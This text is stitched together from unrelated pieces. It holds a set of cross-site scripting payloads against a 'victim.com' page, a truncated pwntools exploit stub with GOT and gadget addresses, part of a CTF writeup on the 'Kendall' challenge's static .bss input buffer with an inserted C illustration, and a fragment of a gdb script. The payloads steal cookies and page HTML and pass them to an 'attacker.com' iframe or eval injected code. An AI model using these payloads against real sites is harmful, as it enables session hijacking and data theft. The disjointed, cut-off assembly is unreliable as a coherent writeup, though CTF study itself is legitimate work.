<script>
window.top.postMessage(document.cookie, '*');
</script>
<script>
window.addEventListener(
  'message',
  function(e) {
    window.top.postMessage(
      function() {var x=new XMLHttpRequest();x.open('GET',e.data,false);x.send();return x.responseText}(), '*'
    )
  },
  false);
</script>
<script>
var w = window.open("http://www.victim.com/vulnerable.php?string=<script>window.addEventListener('message', function(e) {eval(e.data);}, false)</script>", "somewindow");
w.postMessage("window.opener.postMessage(document.body.innerHTML, '*')", "*");
</script>
http://victim.com/vulnerable.php?string=<script>window.top.postMessage(function() {var x=new XMLHttpRequest();x.open('GET','/other/page.html',false);x.send();return x.responseText}(), '*')</script>
http://victim.com/vulnerable.php?string=<iframe src="http://attacker.com/"></iframe><script>window.addEventListener('message', function(e) {eval(e.data);}, false)</script>
http://victim.com/vulnerable.php?string=<iframe src="http://attacker.com/" id="someframe"></iframe><script>document.getElementById('someframe').contentWindow.postMessage(document.body.innerHTML, '*')</script>
http://victim.com/vulnerable.php?string=<script>window.top.postMessage(document.body.innerHTML, '*')</script>
from pwn import *
import struct
import sys
lei = lambda x: struct.pack('I', x)  # pack a 32-bit little-endian integer
stack_chk = 0x0804B01C  # location of __stack_chk_fail in the GOT
ret = 0x08048D89  # stack pivot gadget (sub esp, 0x1c; pop; pop; pop; pop; ret)
live = True
if live:
    pass  # connection setup for the live target follows here; not included on this page

Kendall

Kendall was a 300 point "red" challenge - an exploitable. This was a pretty involved challenge, but it was simple once you realized what you had to do. Launching the binary would start a forking server for some DHCP Management Console.

Playing around with the console, it's clear that authenticating is going to be integral to solving the challenge. The authenticate function opens a password.txt file and compares it with your input. You could probably use the strcmp as a timing oracle to brute force the password, but that's kind of lame.

While reversing, we noticed the same strange function being used to read user input everywhere. Strange, mostly because it only accepted a size parameter. It neither accepted a destination buffer nor allocated space for one - it always used the same statically sized 128 byte buffer in the .bss segment.
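As an added illustration (not the challenge binary's code; function names are assumed), this is the shape of a read routine that takes only a size and always writes into one static 128-byte .bss buffer, placed next to the bounded version a defender would want. The fd is assumed to be the client socket of the forking server; the helper stands a pipe in for it so the block runs offline.

```c
#include <stddef.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 128
/* One shared, fixed-size input buffer in .bss, as the writeup describes. */
static char g_input[BUF_SIZE];

/* Shape of the routine the writeup describes (assumed names): only the
 * size is a parameter, so a request larger than 128 makes read() write
 * past g_input into whatever the linker placed after it in .bss. */
ssize_t read_input_unchecked(int fd, size_t size) {
    return read(fd, g_input, size);
}

/* Hardened form: clamp the request to the buffer, keep one byte for a
 * terminator, and return the byte count so callers see what was read. */
ssize_t read_input_bounded(int fd, size_t size) {
    if (size >= BUF_SIZE)
        size = BUF_SIZE - 1;
    ssize_t n = read(fd, g_input, size);
    if (n < 0)
        return -1;
    g_input[n] = '\0';
    return n;
}

/* Test helper: push `len` copies of `fill` through a pipe (standing in for
 * the server's client socket) and return what the bounded reader accepted. */
ssize_t feed_bounded(char fill, size_t len, size_t requested) {
    char data[512];
    int p[2];
    if (len > sizeof data || pipe(p) != 0)
        return -1;
    memset(data, fill, len);
    if (write(p[1], data, len) != (ssize_t)len) {
        close(p[0]);
        close(p[1]);
        return -1;
    }
    close(p[1]);
    ssize_t n = read_input_bounded(p[0], requested);
    close(p[0]);
    return n;
}
```

Requesting 300 bytes through the bounded reader yields at most 127, whereas the unchecked form would hand the full 300 to read() against a 128-byte buffer.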

set $root = 0x804c36c
# first element
break *0x08049030
commands
silent
printf "allocated first_node->name @ 0x%x\n", $eax
continue
end
break *0x0804903D